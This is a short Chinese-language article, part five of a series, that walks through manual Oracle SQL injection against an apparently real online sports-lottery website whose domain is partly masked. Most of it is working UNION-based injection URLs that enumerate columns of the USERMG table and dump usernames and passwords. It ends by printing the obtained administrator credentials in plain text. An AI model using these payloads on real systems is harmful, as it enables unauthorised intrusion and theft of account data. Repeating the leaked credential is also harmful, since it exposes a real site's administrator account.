参考案例:手工Oracle注入某足彩在线网站(5) |
| 发布时间: 2012/7/7 11:29:20 |
|
查询获取字段名及内容
选择对USERMG表进行查询,提交: http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select '1',2,'3',(select column_name from user_tab_columns where table_name='USERMG' and rownum=1),5,'6','7' from dual 返回USERMG表中第一个字段名USER_NAME,再提交: http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select '1',2,'3',(select column_name from user_tab_columns where table_name='USERMG' and column_name<>'USER_NAME' and rownum=1),5,'6','7' from dual 图6 返回表中字段名 返回第2个字段名USER_PASS(图6)。这两个字段名很明显是用来存储用户名和密码的,直接查询其内容: http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select USERNAME,2,'3',USER_PASS,5,'6','7' from USERMG 返回页面中,得到了用户名和密码为:admin/toto11admin(图7)。 图7 获得管理员帐号数据 本文出自:亿恩科技【www.enkj.com】 |
京公网安备41019702002023号